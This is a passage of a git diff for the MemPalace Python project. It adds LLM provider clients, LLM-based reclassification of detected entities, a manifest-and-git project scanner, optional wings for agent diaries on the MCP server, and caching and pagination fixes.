+        data = _http_post_json(self._resolve_url(), body, headers=headers, timeout=self.timeout)
+        try:
+            text = data["choices"][0]["message"]["content"]
+        except (KeyError, IndexError, TypeError) as e:
+            raise LLMError(f"Unexpected response shape: {e}") from e
+        if not text:
+            raise LLMError(f"Empty response from {self.name} (model={self.model})")
+        return LLMResponse(text=text, model=self.model, provider=self.name, raw=data)
+
+
+# ==================== ANTHROPIC ====================
+
+
+class AnthropicProvider(LLMProvider):
+    name = "anthropic"
+    DEFAULT_ENDPOINT = "https://api.anthropic.com"
+    API_VERSION = "2023-06-01"
+
+    def __init__(
+        self,
+        model: str,
+        api_key: Optional[str] = None,
+        endpoint: Optional[str] = None,
+        timeout: int = 120,
+        **_: object,
+    ):
+        key = api_key or os.environ.get("ANTHROPIC_API_KEY")
+        super().__init__(
+            model=model,
+            endpoint=endpoint or self.DEFAULT_ENDPOINT,
+            api_key=key,
+            timeout=timeout,
+        )
+
+    def check_available(self) -> tuple[bool, str]:
+        if not self.api_key:
+            return False, "ANTHROPIC_API_KEY not set (use --llm-api-key or env)"
+        # Don't probe — a live request would cost money. First real call will
+        # surface auth errors if the key is invalid.
+        return True, "ok"
+
+    def classify(self, system: str, user: str, json_mode: bool = True) -> LLMResponse:
+        if not self.api_key:
+            raise LLMError("Anthropic provider requires ANTHROPIC_API_KEY env or --llm-api-key")
+        sys_prompt = system
+        if json_mode:
+            sys_prompt += "\n\nRespond with valid JSON only, no prose."
+        body = {
+            "model": self.model,
+            "max_tokens": 2048,
+            "temperature": 0.1,
+            "system": sys_prompt,
+            "messages": [{"role": "user", "content": user}],
+        }
+        headers = {
+            "X-API-Key": self.api_key,
+            "anthropic-version": self.API_VERSION,
+        }
+        data = _http_post_json(
+            f"{self.endpoint}/v1/messages", body, headers=headers, timeout=self.timeout
+        )
+        try:
+            text = "".join(
+                b.get("text", "") for b in data.get("content", []) or [] if b.get("type") == "text"
+            )
+        except (AttributeError, TypeError) as e:
+            raise LLMError(f"Unexpected response shape: {e}") from e
+        if not text:
+            raise LLMError(f"Empty response from Anthropic (model={self.model})")
+        return LLMResponse(text=text, model=self.model, provider=self.name, raw=data)
+
+
+# ==================== FACTORY ====================
+
+
+PROVIDERS: dict[str, type[LLMProvider]] = {
+    "ollama": OllamaProvider,
+    "openai-compat": OpenAICompatProvider,
+    "anthropic": AnthropicProvider,
+}
+
+
+def get_provider(
+    name: str,
+    model: str,
+    endpoint: Optional[str] = None,
+    api_key: Optional[str] = None,
+    timeout: int = 120,
+) -> LLMProvider:
+    """Build a provider by name. Raises LLMError on unknown provider."""
+    cls = PROVIDERS.get(name)
+    if cls is None:
+        raise LLMError(f"Unknown provider '{name}'. Choices: {sorted(PROVIDERS.keys())}")
+    return cls(model=model, endpoint=endpoint, api_key=api_key, timeout=timeout)
diff --git a/mempalace/llm_refine.py b/mempalace/llm_refine.py
new file mode 100644
index 000000000..faa737ae4
--- /dev/null
+++ b/mempalace/llm_refine.py
@@ -0,0 +1,446 @@
+"""
+llm_refine.py — Optional LLM refinement of regex-detected entities.
+
+Takes the candidate set produced by phase-1 detection (manifests, git
+authors, regex on prose) and asks an LLM to reclassify each candidate as
+PERSON / PROJECT / TOPIC / COMMON_WORD / AMBIGUOUS.
+
+Design constraints:
+- Opt-in. Default init path never imports this module.
+- Local-first by default (Ollama).
+- Interactive UX: visible progress, clean cancellation (Ctrl-C returns
+  whatever was classified before the interrupt).
+- Don't feed the raw corpus to the LLM — feed candidates + a few sampled
+  context lines each. Keeps total input to ~50-100K tokens even for huge
+  prose corpora.
+
+Public:
+    refine_entities(detected, corpus_text, provider, ...) -> RefineResult
+"""
+
+from __future__ import annotations
+
+import json
+import re
+import sys
+from dataclasses import dataclass
+
+from mempalace.llm_client import LLMError, LLMProvider
+
+
+BATCH_SIZE = 25  # candidates per LLM call; tuned for 4B local models
+CONTEXT_LINES_PER_CANDIDATE = 3
+CONTEXT_WINDOW_CHARS = 240  # max chars per context line to keep tokens bounded
+
+# Valid labels the LLM is allowed to return. Anything else is treated as
+# AMBIGUOUS so the user reviews it.
+VALID_LABELS = {"PERSON", "PROJECT", "TOPIC", "COMMON_WORD", "AMBIGUOUS"}
+
+
+SYSTEM_PROMPT = """You are helping organize a user's memory palace by classifying capitalized tokens found in their files.
+
+For each candidate, pick exactly ONE label:
+- PERSON: a specific real person the user knows (colleague, family, character they write about)
+- PROJECT: a named product, codebase, or effort the user works on
+- TOPIC: a recurring theme or subject (not a person, not a project) — cities, technologies, concepts
+- COMMON_WORD: an English word, verb, or fragment that isn't a named entity at all (e.g. "Created", "Before", "Never")
+- AMBIGUOUS: context is insufficient to decide between two of the above
+
+Frameworks, runtimes, APIs, cloud services, vendors, and third-party products
+(e.g. Angular, OpenAPI, Terraform, Bun, Google) are TOPIC unless the context
+clearly says this is the user's own named codebase, product, or active effort.
+
+Use the provided context lines to disambiguate. A capitalized word that only appears in metadata ("Created: 2026-04-24") is COMMON_WORD. A name that appears with pronouns and dialogue is PERSON.
+
+Respond with JSON only. Schema:
+{"classifications": [{"name": "<exact candidate name>", "label": "<LABEL>", "reason": "<one short sentence>"}]}
+
+One entry per candidate, same order as the input."""
+
+
+@dataclass
+class RefineResult:
+    merged: dict  # updated detected dict
+    reclassified: int  # entries whose type changed
+    dropped: int  # entries removed from the merged result (COMMON_WORD only)
+    errors: list[str]  # per-batch error messages (transport/parse failures)
+    batches_completed: int
+    batches_total: int
+    cancelled: bool
+
+
+def _collect_contexts(
+    corpus_lines: list[str], name: str, max_lines: int = CONTEXT_LINES_PER_CANDIDATE
+) -> list[str]:
+    """Return up to `max_lines` distinct lines from the corpus that mention `name`.
+
+    Case-insensitive token-boundary match. Lines are truncated to
+    CONTEXT_WINDOW_CHARS chars to keep token usage bounded.
+    """
+    needle = re.compile(rf"(?<!\w){re.escape(name)}(?!\w)", re.IGNORECASE)
+    seen: set[str] = set()
+    out: list[str] = []
+    for line in corpus_lines:
+        if not needle.search(line):
+            continue
+        trimmed = line.strip()[:CONTEXT_WINDOW_CHARS]
+        if not trimmed or trimmed in seen:
+            continue
+        seen.add(trimmed)
+        out.append(trimmed)
+        if len(out) >= max_lines:
+            break
+    return out
+
+
+def _build_user_prompt(candidates_with_contexts: list[tuple[str, str, list[str]]]) -> str:
+    """Shape: for each candidate, list its current type guess + sampled contexts."""
+    parts: list[str] = ["CANDIDATES:"]
+    for i, (name, current_type, contexts) in enumerate(candidates_with_contexts, 1):
+        parts.append(f"\n{i}. {name}  (currently: {current_type})")
+        if contexts:
+            for c in contexts:
+                parts.append(f"   > {c}")
+        else:
+            parts.append("   > (no context available)")
+    return "\n".join(parts)
+
+
+def _extract_json_candidates(text: str) -> list[str]:
+    """Return de-duplicated substrings of an LLM reply that may be JSON, whole reply first."""
+    text = text.strip()
+    if not text:
+        return []
+    # 1) The whole (stripped) reply is always the first candidate.
+    candidates: list[str] = [text]
+    # 2) Bodies of ``` fenced blocks, with or without a "json" tag.
+    for match in re.finditer(r"```(?:json)?\s*([\s\S]*?)\s*```", text, re.IGNORECASE):
+        candidate = match.group(1).strip()
+        if candidate and candidate not in candidates:
+            candidates.append(candidate)
+    # 3) For every '{' or '[' in the reply, scan forward to the bracket that balances it.
+    for start, opener in ((i, ch) for i, ch in enumerate(text) if ch in "{["):
+        closer = "}" if opener == "{" else "]"
+        depth = 0  # counts only brackets of the opener's own kind
+        in_string = False  # True while inside a double-quoted string
+        escaped = False  # True right after a backslash inside a string
+        for i in range(start, len(text)):
+            ch = text[i]
+            if in_string:
+                if escaped:
+                    escaped = False
+                elif ch == "\\":
+                    escaped = True
+                elif ch == '"':
+                    in_string = False
+                continue  # brackets inside strings never touch depth
+
+            if ch == '"':
+                in_string = True
+            elif ch == opener:
+                depth += 1
+            elif ch == closer:
+                depth -= 1
+                if depth == 0:  # balanced span found for this start position
+                    candidate = text[start : i + 1].strip()
+                    if candidate and candidate not in candidates:
+                        candidates.append(candidate)
+                    break  # a start that never balances contributes nothing
+
+    return candidates
+
+
+def _parse_response(text: str, expected_names: list[str]) -> dict[str, tuple[str, str]]:
+    """Parse the LLM's JSON response into {name: (label, reason)}.
+
+    Robust to the model occasionally wrapping JSON in text or returning
+    slight schema variations. Falls back to matching by candidate name.
+    """
+    data = None
+    for candidate in _extract_json_candidates(text):
+        try:
+            data = json.loads(candidate)
+            break
+        except json.JSONDecodeError:
+            continue
+    if data is None:
+        return {}
+
+    entries = data.get("classifications") if isinstance(data, dict) else data
+    if not isinstance(entries, list):
+        return {}
+
+    name_to_label: dict[str, tuple[str, str]] = {}
+    expected_set = {n.lower(): n for n in expected_names}
+    for entry in entries:
+        if not isinstance(entry, dict):
+            continue
+        name = entry.get("name") or entry.get("candidate")
+        label = entry.get("label") or entry.get("type") or entry.get("classification")
+        reason = entry.get("reason") or ""
+        if not isinstance(name, str) or not isinstance(label, str):
+            continue
+        # Restore canonical casing from expected_names
+        canonical = expected_set.get(name.lower(), name)
+        lbl = label.strip().upper()
+        if lbl not in VALID_LABELS:
+            lbl = "AMBIGUOUS"
+        name_to_label[canonical] = (lbl, reason.strip()[:120])
+    return name_to_label
+
+
+def _apply_classifications(
+    detected: dict,
+    decisions: dict[str, tuple[str, str]],
+    allow_project_promotions: bool = True,
+) -> tuple[dict, int, int]:
+    """Merge LLM decisions back into the detected dict.
+
+    Returns (new_detected, reclassified_count, dropped_count).
+    """
+    label_to_bucket = {
+        "PERSON": "people",
+        "PROJECT": "projects",
+        "TOPIC": "uncertain",
+        "AMBIGUOUS": "uncertain",
+    }
+
+    # Index every entity by name for in-place update
+    all_entries: list[tuple[str, dict]] = []
+    for bucket, items in detected.items():
+        for e in items:
+            all_entries.append((bucket, e))
+
+    reclassified = 0
+    dropped = 0
+    new_detected: dict[str, list[dict]] = {
+        "people": [],
+        "projects": [],
+        "uncertain": [],
+    }
+
+    for old_bucket, entry in all_entries:
+        decision = decisions.get(entry["name"])
+        if decision is None:
+            # No LLM opinion — keep as-is
+            new_detected[old_bucket].append(entry)
+            continue
+
+        label, reason = decision
+        if label == "COMMON_WORD":
+            dropped += 1
+            continue
+
+        target_bucket = label_to_bucket[label]
+        if (
+            label == "PROJECT"
+            and not allow_project_promotions
+            and not _is_authoritative_project(entry)
+        ):
+            target_bucket = "uncertain"
+        updated = dict(entry)
+        # Append the LLM's reason as a new signal so the user sees why it moved
+        signals = list(updated.get("signals", []))
+        signals.append(f"LLM: {label.lower()} — {reason}" if reason else f"LLM: {label.lower()}")
+        updated["signals"] = signals
+        if target_bucket != old_bucket:
+            reclassified += 1
+            updated["type"] = (
+                "person"
+                if target_bucket == "people"
+                else "project"
+                if target_bucket == "projects"
+                else "uncertain"
+            )
+        new_detected[target_bucket].append(updated)
+
+    return new_detected, reclassified, dropped
+
+
+def _is_authoritative_person(entry: dict) -> bool:
+    """Return True for git-author people that should not be second-guessed."""
+    signals = " ".join(entry.get("signals", [])).lower()
+    return "commit" in signals and "repo" in signals
+
+
+def _is_authoritative_project(entry: dict) -> bool:
+    """Return True for manifest/git-backed projects that are already source-backed."""
+    signals = " ".join(entry.get("signals", [])).lower()
+    manifest_markers = ("package.json", "pyproject.toml", "cargo.toml", "go.mod")
+    return any(marker in signals for marker in manifest_markers) or "commit" in signals
+
+
+def _print_progress(batch_idx: int, total: int, current_name: str) -> None:
+    """Overwrite-line progress indicator."""
+    width = 40
+    filled = int(width * batch_idx / total) if total else 0
+    bar = "█" * filled + "░" * (width - filled)
+    msg = f"\r  LLM refine: [{bar}] batch {batch_idx}/{total}  current: {current_name[:30]:<30}"
+    sys.stderr.write(msg)
+    sys.stderr.flush()
+
+
+def refine_entities(
+    detected: dict,
+    corpus_text: str,
+    provider: LLMProvider,
+    batch_size: int = BATCH_SIZE,
+    show_progress: bool = True,
+    allow_project_promotions: bool = True,
+) -> RefineResult:
+    """Reclassify detected entities using the LLM provider.
+
+    Only regex-derived candidates are sent for refinement. Git authors and
+    manifest/git-backed projects are already source-backed and don't benefit
+    from LLM second-guessing.
+
+    Ctrl-C during refinement: cancels the remaining batches, returns a
+    RefineResult with ``cancelled=True`` and whatever was classified before
+    the interrupt. The partial result is safe to pass straight to
+    ``confirm_entities``.
+
+    Transport or parse failures in individual batches are recorded in
+    ``errors`` and do not abort the run.
+
+    ``allow_project_promotions=False`` keeps LLM-only project guesses in the
+    uncertain bucket. This is useful when manifest/git signal already supplied
+    canonical projects and regex/LLM hits are likely tools, vendors, or topics.
+    """
+    candidates: list[tuple[str, str]] = []
+    current_type = {"people": "person", "projects": "project", "uncertain": "uncertain"}
+    for bucket in ("people", "projects", "uncertain"):
+        for e in detected.get(bucket, []):
+            if bucket == "people" and _is_authoritative_person(e):
+                continue
+            if bucket == "projects" and _is_authoritative_project(e):
+                continue
+            candidates.append((e["name"], current_type[bucket]))
+
+    corpus_lines = corpus_text.splitlines() if corpus_text else []
+
+    # Deduplicate candidate names while preserving order
+    seen: set[str] = set()
+    unique: list[tuple[str, str]] = []
+    for name, kind in candidates:
+        if name not in seen:
+            seen.add(name)
+            unique.append((name, kind))
+
+    if not unique:
+        return RefineResult(
+            merged=detected,
+            reclassified=0,
+            dropped=0,
+            errors=[],
+            batches_completed=0,
+            batches_total=0,
+            cancelled=False,
+        )
+
+    # Build batches
+    batches: list[list[tuple[str, str, list[str]]]] = []
+    for i in range(0, len(unique), batch_size):
+        chunk = unique[i : i + batch_size]
+        enriched = [(name, kind, _collect_contexts(corpus_lines, name)) for name, kind in chunk]
+        batches.append(enriched)
+
+    all_decisions: dict[str, tuple[str, str]] = {}
+    errors: list[str] = []
+    completed = 0
+    cancelled = False
+
+    for idx, batch in enumerate(batches, 1):
+        if show_progress and batch:
+            _print_progress(idx - 1, len(batches), batch[0][0])
+        user_prompt = _build_user_prompt(batch)
+        try:
+            resp = provider.classify(SYSTEM_PROMPT, user_prompt, json_mode=True)
+        except KeyboardInterrupt:
+            cancelled = True
+            break
+        except LLMError as e:
+            errors.append(f"batch {idx}: {e}")
+            continue
+        names_in_batch = [name for name, _, _ in batch]
+        decisions = _parse_response(resp.text, names_in_batch)
+        if not decisions:
+            errors.append(f"batch {idx}: could not parse response")
+        all_decisions.update(decisions)
+        completed += 1
+        if show_progress:
+            _print_progress(idx, len(batches), batch[-1][0])
+
+    if show_progress:
+        sys.stderr.write("\n")
+        sys.stderr.flush()
+
+    merged, reclassified, dropped = _apply_classifications(
+        detected,
+        all_decisions,
+        allow_project_promotions=allow_project_promotions,
+    )
+
+    return RefineResult(
+        merged=merged,
+        reclassified=reclassified,
+        dropped=dropped,
+        errors=errors,
+        batches_completed=completed,
+        batches_total=len(batches),
+        cancelled=cancelled,
+    )
+
+
+def collect_corpus_text(
+    project_dir: str,
+    max_files: int = 30,
+    max_bytes_per_file: int = 20_000,
+) -> str:
+    """Gather prose text from ``project_dir`` for use as LLM context source.
+
+    Reads up to ``max_files`` prose files (``.md``, ``.txt``, ``.rst``), most
+    recently modified first. Each file is capped at ``max_bytes_per_file`` —
+    characters rather than bytes, because files are opened in text mode.
+    """
+    from pathlib import Path
+
+    from mempalace.entity_detector import PROSE_EXTENSIONS, SKIP_DIRS
+
+    root = Path(project_dir).expanduser().resolve()
+    if not root.is_dir():
+        return ""  # missing or non-directory input yields an empty corpus
+    candidates: list[tuple[float, Path]] = []
+    for dirpath, dirs, files in _walk_prose(root, SKIP_DIRS):
+        for fname in files:
+            p = dirpath / fname
+            if p.suffix.lower() not in PROSE_EXTENSIONS:
+                continue
+            try:
+                mtime = p.stat().st_mtime
+            except OSError:
+                continue  # file cannot be stat'ed: skip it
+            candidates.append((mtime, p))
+    candidates.sort(reverse=True)  # largest mtime (newest) first
+    selected = [p for _, p in candidates[:max_files]]
+    chunks: list[str] = []
+    for p in selected:
+        try:
+            with open(p, encoding="utf-8", errors="replace") as f:
+                chunks.append(f.read(max_bytes_per_file))  # text-mode read(n) counts characters
+        except OSError:
+            continue  # unreadable file: skip it, keep the rest
+    return "\n".join(chunks)
+
+
+def _walk_prose(root, skip_dirs):
+    """Walk a directory yielding (Path, dirs, files), pruning skip_dirs.
+
+    Inlined from ``project_scanner._walk`` to avoid a private-name import
+    coupling. Functionality is intentionally narrow: prose collection only.
+    """
+    import os
+    from pathlib import Path
+
+    for dirpath, dirs, files in os.walk(root):
+        dirs[:] = [d for d in dirs if d not in skip_dirs and not d.startswith(".")]
+        yield Path(dirpath), dirs, files
diff --git a/mempalace/mcp_server.py b/mempalace/mcp_server.py
index 06355c46e..2650e3073 100644
--- a/mempalace/mcp_server.py
+++ b/mempalace/mcp_server.py
@@ -2,7 +2,7 @@
 """
 MemPalace MCP Server — read/write palace access for Claude Code
 ================================================================
-Install: claude mcp add mempalace -- python -m mempalace.mcp_server [--palace /path/to/palace]
+Install: claude mcp add mempalace -- mempalace-mcp [--palace /path/to/palace]
 
 Tools (read):
   mempalace_status          — total drawers, wing/room breakdown
@@ -285,7 +285,7 @@ def _get_cached_metadata(col, where=None):
 
 def _sanitize_optional_name(value: str = None, field_name: str = "name") -> str:
     """Validate optional wing/room-style filters."""
-    if value is None:
+    if value is None or not value.strip():
         return None
     return sanitize_name(value, field_name)
 
@@ -918,10 +918,10 @@ def tool_kg_stats():
 # ==================== AGENT DIARY ====================
 
 
-def tool_diary_write(agent_name: str, entry: str, topic: str = "general"):
+def tool_diary_write(agent_name: str, entry: str, topic: str = "general", wing: str = ""):
     """
-    Write a diary entry for this agent. Each agent gets its own wing
-    with a diary room. Entries are timestamped and accumulate over time.
+    Write a diary entry for this agent. Entries are timestamped and
+    accumulate over time in a diary room.
 
     This is the agent's personal journal — observations, thoughts,
     what it worked on, what it noticed, what it thinks matters.
@@ -932,7 +932,10 @@ def tool_diary_write(agent_name: str, entry: str, topic: str = "general"):
     except ValueError as e:
         return {"success": False, "error": str(e)}
 
-    wing = f"wing_{agent_name.lower().replace(' ', '_')}"
+    if wing:
+        wing = sanitize_name(wing)
+    else:
+        wing = f"wing_{agent_name.lower().replace(' ', '_')}"
     room = "diary"
     col = _get_collection(create=True)
     if not col:
@@ -987,24 +990,38 @@ def tool_diary_write(agent_name: str, entry: str, topic: str = "general"):
         return {"success": False, "error": str(e)}
 
 
-def tool_diary_read(agent_name: str, last_n: int = 10):
+def tool_diary_read(agent_name: str, last_n: int = 10, wing: str = ""):
     """
     Read an agent's recent diary entries. Returns the last N entries
     in chronological order — the agent's personal journal.
+
+    When ``wing`` is provided, reads only from that wing. When ``wing``
+    is empty or omitted, returns entries from every wing this agent has
+    written to. Diary writes from hooks land in project-derived wings
+    (``wing_<project>``), so requiring a specific wing on read would
+    silo those entries from agent-initiated reads.
     """
     try:
         agent_name = sanitize_name(agent_name, "agent_name")
+        if wing:
+            wing = sanitize_name(wing)
     except ValueError as e:
         return {"error": str(e)}
     last_n = max(1, min(last_n, 100))
-    wing = f"wing_{agent_name.lower().replace(' ', '_')}"
     col = _get_collection()
     if not col:
         return _no_palace()
 
+    # Build filter: always scope by agent + room=diary. Wing is optional —
+    # when empty, return entries across all wings for this agent (matches
+    # the #1097 empty-string-as-no-filter convention for LLM ergonomics).
+    conditions = [{"room": "diary"}, {"agent": agent_name}]
+    if wing:
+        conditions.insert(0, {"wing": wing})
+
     try:
         results = col.get(
-            where={"$and": [{"wing": wing}, {"room": "diary"}]},
+            where={"$and": conditions},
             include=["documents", "metadatas"],
             limit=10000,
         )
@@ -1497,6 +1514,10 @@ def tool_reconnect():
                     "type": "string",
                     "description": "Topic tag (optional, default: general)",
                 },
+                "wing": {
+                    "type": "string",
+                    "description": "Target wing for this diary entry (optional). If omitted, uses wing_{agent_name}. Use this to write diary entries to a project wing instead of an agent-specific wing.",
+                },
             },
             "required": ["agent_name", "entry"],
         },
@@ -1515,6 +1536,10 @@ def tool_reconnect():
                     "type": "integer",
                     "description": "Number of recent entries to read (default: 10)",
                 },
+                "wing": {
+                    "type": "string",
+                    "description": "Wing to read diary entries from (optional). If omitted or empty, returns this agent's diary entries from every wing it has written to.",
+                },
             },
             "required": ["agent_name"],
         },
diff --git a/mempalace/miner.py b/mempalace/miner.py
index 56b767f78..9e8ff5eb7 100644
--- a/mempalace/miner.py
+++ b/mempalace/miner.py
@@ -52,6 +52,7 @@
 }
 
 SKIP_FILENAMES = {
+    "entities.json",
     "mempalace.yaml",
     "mempalace.yml",
     "mempal.yaml",
@@ -471,6 +472,97 @@ def _load_known_entities_raw() -> dict:
     return dict(_ENTITY_REGISTRY_CACHE["raw"])
 
 
+def add_to_known_entities(entities_by_category: dict) -> str:
+    """Union ``entities_by_category`` into ``~/.mempalace/known_entities.json``.
+
+    Accepts ``{category: [names]}`` shape as produced by ``mempalace init``
+    and merges into the registry the miner reads at mine time. Existing
+    categories are preserved untouched unless also present in the input;
+    for categories present in both, entries are unioned case-insensitively
+    without changing the on-disk ordering of pre-existing names.
+
+    If a category is stored on-disk as ``{name: code}`` (the alternate
+    miner-supported shape, used by dialect-style configs), new names are
+    added as keys with ``None`` values so existing code mappings aren't
+    overwritten. A later compress pass can assign codes.
+
+    The in-process cache is invalidated on write so same-process callers
+    (notably ``cmd_init`` → ``cmd_mine`` in sequence) see the update
+    immediately instead of waiting for a mtime re-check.
+
+    Returns the registry path as a string for logging.
+    """
+    import json as _json
+    from pathlib import Path as _Path
+
+    registry_path = _Path(_ENTITY_REGISTRY_PATH)
+    registry_path.parent.mkdir(parents=True, exist_ok=True)
+
+    existing: dict = {}
+    if registry_path.exists():
+        try:
+            loaded = _json.loads(registry_path.read_text(encoding="utf-8"))
+            if isinstance(loaded, dict):
+                existing = loaded
+        except (_json.JSONDecodeError, OSError):
+            existing = {}
+
+    def _coerce_name(value):
+        if not value:
+            return None
+        name = str(value)
+        return name if name else None
+
+    for category, names in entities_by_category.items():
+        if not isinstance(names, list) or not names:
+            continue
+        current = existing.get(category)
+        if isinstance(current, list):
+            seen_lower = {str(n).lower() for n in current}
+            for n in names:
+                name = _coerce_name(n)
+                if not name:
+                    continue
+                if name.lower() not in seen_lower:
+                    current.append(name)
+                    seen_lower.add(name.lower())
+        elif isinstance(current, dict):
+            seen_lower = {str(name).lower() for name in current}
+            for n in names:
+                name = _coerce_name(n)
+                if not name or name.lower() in seen_lower:
+                    continue
+                current[name] = None
+                seen_lower.add(name.lower())
+        else:
+            # Missing or unrecognized shape — seed as a fresh list, deduped
+            seen: set = set()
+            ordered: list = []
+            for n in names:
+                name = _coerce_name(n)
+                if not name:
+                    continue
+                key = name.lower()
+                if key in seen:
+                    continue
+                seen.add(key)
+                ordered.append(name)
+            existing[category] = ordered
+
+    registry_path.write_text(_json.dumps(existing, indent=2, ensure_ascii=False), encoding="utf-8")
+    try:
+        registry_path.chmod(0o600)
+    except (OSError, NotImplementedError):
+        pass
+
+    # Invalidate in-process cache so later calls in the same run see the write.
+    _ENTITY_REGISTRY_CACHE["mtime"] = None
+    _ENTITY_REGISTRY_CACHE["names"] = frozenset()
+    _ENTITY_REGISTRY_CACHE["raw"] = {}
+
+    return str(registry_path)
+
+
 _HALL_KEYWORDS_CACHE = None
 
 
@@ -847,18 +939,24 @@ def status(palace_path: str):
         print("  Run: mempalace init <dir> then mempalace mine <dir>")
         return
 
-    # Count by wing and room
+    # Count by wing and room — paginate to avoid SQLite "too many SQL
+    # variables" error on large palaces (see #802, #850).
     total = col.count()
-    r = col.get(limit=total, include=["metadatas"]) if total else {"metadatas": []}
-    metas = r["metadatas"]
-
-    wing_rooms = defaultdict(lambda: defaultdict(int))
-    for m in metas:
-        m = m or {}
-        wing_rooms[m.get("wing", "?")][m.get("room", "?")] += 1
+    wing_rooms: dict = defaultdict(lambda: defaultdict(int))
+    batch_size = 5000
+    offset = 0
+    while offset < total:
+        r = col.get(limit=batch_size, offset=offset, include=["metadatas"])
+        batch = r["metadatas"]
+        if not batch:
+            break
+        for m in batch:
+            m = m or {}
+            wing_rooms[m.get("wing", "?")][m.get("room", "?")] += 1
+        offset += len(batch)
 
     print(f"\n{'=' * 55}")
-    print(f"  MemPalace Status — {len(metas)} drawers")
+    print(f"  MemPalace Status — {total} drawers")
     print(f"{'=' * 55}\n")
     for wing, rooms in sorted(wing_rooms.items()):
         print(f"  WING: {wing}")
diff --git a/mempalace/palace_graph.py b/mempalace/palace_graph.py
index 71cad89ec..125ec0d4a 100644
--- a/mempalace/palace_graph.py
+++ b/mempalace/palace_graph.py
@@ -18,6 +18,8 @@
 import hashlib
 import json
 import os
+import threading
+import time
 from collections import Counter, defaultdict
 from datetime import datetime, timezone
 
@@ -25,6 +27,23 @@
 from .palace import get_collection as _get_palace_collection
 from .palace import mine_lock
 
+# Module-level graph cache with TTL and write-invalidation.
+# Warm cache serves build_graph() in O(1); invalidate_graph_cache() clears on writes.
+_graph_cache_lock = threading.Lock()
+_graph_cache_nodes = None
+_graph_cache_edges = None
+_graph_cache_time = 0.0
+_GRAPH_CACHE_TTL = 60.0  # seconds — graph changes less often than metadata
+
+
+def invalidate_graph_cache():
+    """Clear the graph cache. Called from mcp_server.py on writes."""
+    global _graph_cache_nodes, _graph_cache_edges, _graph_cache_time
+    with _graph_cache_lock:
+        _graph_cache_nodes = None
+        _graph_cache_edges = None
+        _graph_cache_time = 0.0
+
 
 def _get_collection(config=None):
     config = config or MempalaceConfig()
@@ -42,10 +61,25 @@ def build_graph(col=None, config=None):
     """
     Build the palace graph from ChromaDB metadata.
 
+    Returns cached result if fresh (within TTL). Cache is invalidated
+    on writes via invalidate_graph_cache(). Thread-safe via _graph_cache_lock.
+
+    Note: warm cache ignores ``col`` and ``config`` arguments — this is
+    intentional for the MCP server's single-palace use case. Callers
+    switching collections should call ``invalidate_graph_cache()`` first.
+
     Returns:
         nodes: dict of {room: {wings: set, halls: set, count: int}}
         edges: list of {room, wing_a, wing_b, hall} — one per tunnel crossing
     """
+    global _graph_cache_nodes, _graph_cache_edges, _graph_cache_time
+    now = time.time()
+    # NOTE: warm cache ignores col/config args — intentional for the MCP server's
+    # single-palace use case. Callers switching collections must invalidate first.
+    with _graph_cache_lock:
+        if _graph_cache_nodes is not None and (now - _graph_cache_time) < _GRAPH_CACHE_TTL:
+            return _graph_cache_nodes, _graph_cache_edges
+
     if col is None:
         col = _get_collection(config)
     if not col:
@@ -101,6 +135,14 @@ def build_graph(col=None, config=None):
             "dates": sorted(data["dates"])[-5:] if data["dates"] else [],
         }
 
+    # Only cache non-empty graphs so new data is picked up immediately
+    # when the palace is first populated.
+    if nodes:
+        with _graph_cache_lock:
+            _graph_cache_nodes = nodes
+            _graph_cache_edges = edges
+            _graph_cache_time = time.time()
+
     return nodes, edges
 
 
diff --git a/mempalace/project_scanner.py b/mempalace/project_scanner.py
new file mode 100644
index 000000000..741a3e2e2
--- /dev/null
+++ b/mempalace/project_scanner.py
@@ -0,0 +1,716 @@
+"""
+project_scanner.py — Detect projects and people from real signal.
+
+For a codebase with build manifests or git history, this beats regex-based
+entity detection by a wide margin: the project's own name is already written
+down in package.json / pyproject.toml / Cargo.toml / go.mod, and the people
+who worked on it are in `git log`.
+
+This module is used as the primary signal in `mempalace init`. The regex
+detector in entity_detector.py stays as a fallback for prose-only folders
+(notes, research, writing).
+
+Public:
+    scan(root) -> (projects, people)
+    to_detected_dict(projects, people) -> {people: [...], projects: [...], uncertain: []}
+"""
+
+from __future__ import annotations
+
+import json
+import os
+import re
+import subprocess
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Optional
+
+try:
+    import tomllib  # Python 3.11+
+except ImportError:  # pragma: no cover
+    try:
+        import tomli as tomllib  # Python 3.9/3.10 backport
+    except ImportError:
+        tomllib = None  # type: ignore
+
+
+SKIP_DIRS = {
+    ".git",
+    "node_modules",
+    "__pycache__",
+    ".venv",
+    "venv",
+    "env",
+    "dist",
+    "build",
+    ".next",
+    "coverage",
+    ".terraform",
+    "vendor",
+    "target",
+    ".mempalace",
+    ".cache",
+    ".pytest_cache",
+    ".mypy_cache",
+    ".ruff_cache",
+}
+
+MAX_DEPTH = 6
+MAX_COMMITS_PER_REPO = 1000
+GIT_TIMEOUT = 10
+
+
+# ==================== DATACLASSES ====================
+
+
+@dataclass
+class ProjectInfo:
+    name: str
+    repo_root: Path
+    manifest: Optional[str] = None
+    has_git: bool = False
+    total_commits: int = 0
+    user_commits: int = 0
+    is_mine: bool = False
+
+    @property
+    def confidence(self) -> float:
+        if self.is_mine:
+            return 0.99
+        if self.has_git and self.total_commits > 0:
+            return 0.7
+        return 0.85  # manifest-only, no git
+
+    def to_signal(self) -> str:
+        parts: list[str] = []
+        if self.manifest:
+            parts.append(self.manifest)
+        if self.has_git:
+            if self.is_mine and self.user_commits:
+                parts.append(f"{self.user_commits} of your commits")
+            elif self.user_commits:
+                parts.append(f"{self.user_commits}/{self.total_commits} yours")
+            else:
+                parts.append(f"{self.total_commits} commits (none by you)")
+        return ", ".join(parts) or "repo"
+
+
+@dataclass
+class PersonInfo:
+    name: str
+    total_commits: int = 0
+    emails: set[str] = field(default_factory=set)
+    repos: set[str] = field(default_factory=set)
+
+    @property
+    def confidence(self) -> float:
+        if self.total_commits >= 100 or len(self.repos) >= 3:
+            return 0.99
+        if self.total_commits >= 20:
+            return 0.85
+        return 0.65
+
+    def to_signal(self) -> str:
+        r = len(self.repos)
+        return f"{self.total_commits} commit{'s' if self.total_commits != 1 else ''} across {r} repo{'s' if r != 1 else ''}"
+
+
+# ==================== MANIFEST PARSING ====================
+
+
+def _parse_package_json(path: Path) -> Optional[str]:
+    try:
+        data = json.loads(path.read_text(encoding="utf-8", errors="replace"))
+    except (json.JSONDecodeError, OSError):
+        return None
+    name = data.get("name") if isinstance(data, dict) else None  # JSON root may be a list/scalar
+    return name if isinstance(name, str) and name else None
+
+
+def _parse_toml(path: Path) -> dict:
+    if tomllib is None:
+        return {}
+    try:
